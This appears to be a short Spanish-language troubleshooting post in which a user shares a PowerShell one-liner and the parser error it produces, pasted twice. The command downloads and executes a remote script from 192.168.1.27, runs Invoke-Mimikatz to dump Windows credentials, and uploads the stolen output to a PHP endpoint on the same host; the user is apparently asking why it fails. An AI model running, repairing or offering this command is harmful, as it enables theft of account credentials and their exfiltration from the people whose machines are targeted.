(este es el comando )
PS C:\WINDOWS\system32> powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.27/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://192.168.1.27/rx.php';, $output)"
(este es el error)
En línea: 1 Carácter: 178
+ ... ew-Object Net.WebClient).UploadString('http://192.168.1.27/rx.php';, )
+ ~
Falta una expresión después de ','.
+ CategoryInfo : ParserError: (
[], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingExpressionAfterToken
PS C:\WINDOWS\system32> powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.27/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://192.168.1.27/rx.php';, $output)"
(este es el error)
En línea: 1 Carácter: 178
+ ... ew-Object Net.WebClient).UploadString('http://192.168.1.27/rx.php';, )
+ ~
Falta una expresión después de ','.
+ CategoryInfo : ParserError: (

+ FullyQualifiedErrorId : MissingExpressionAfterToken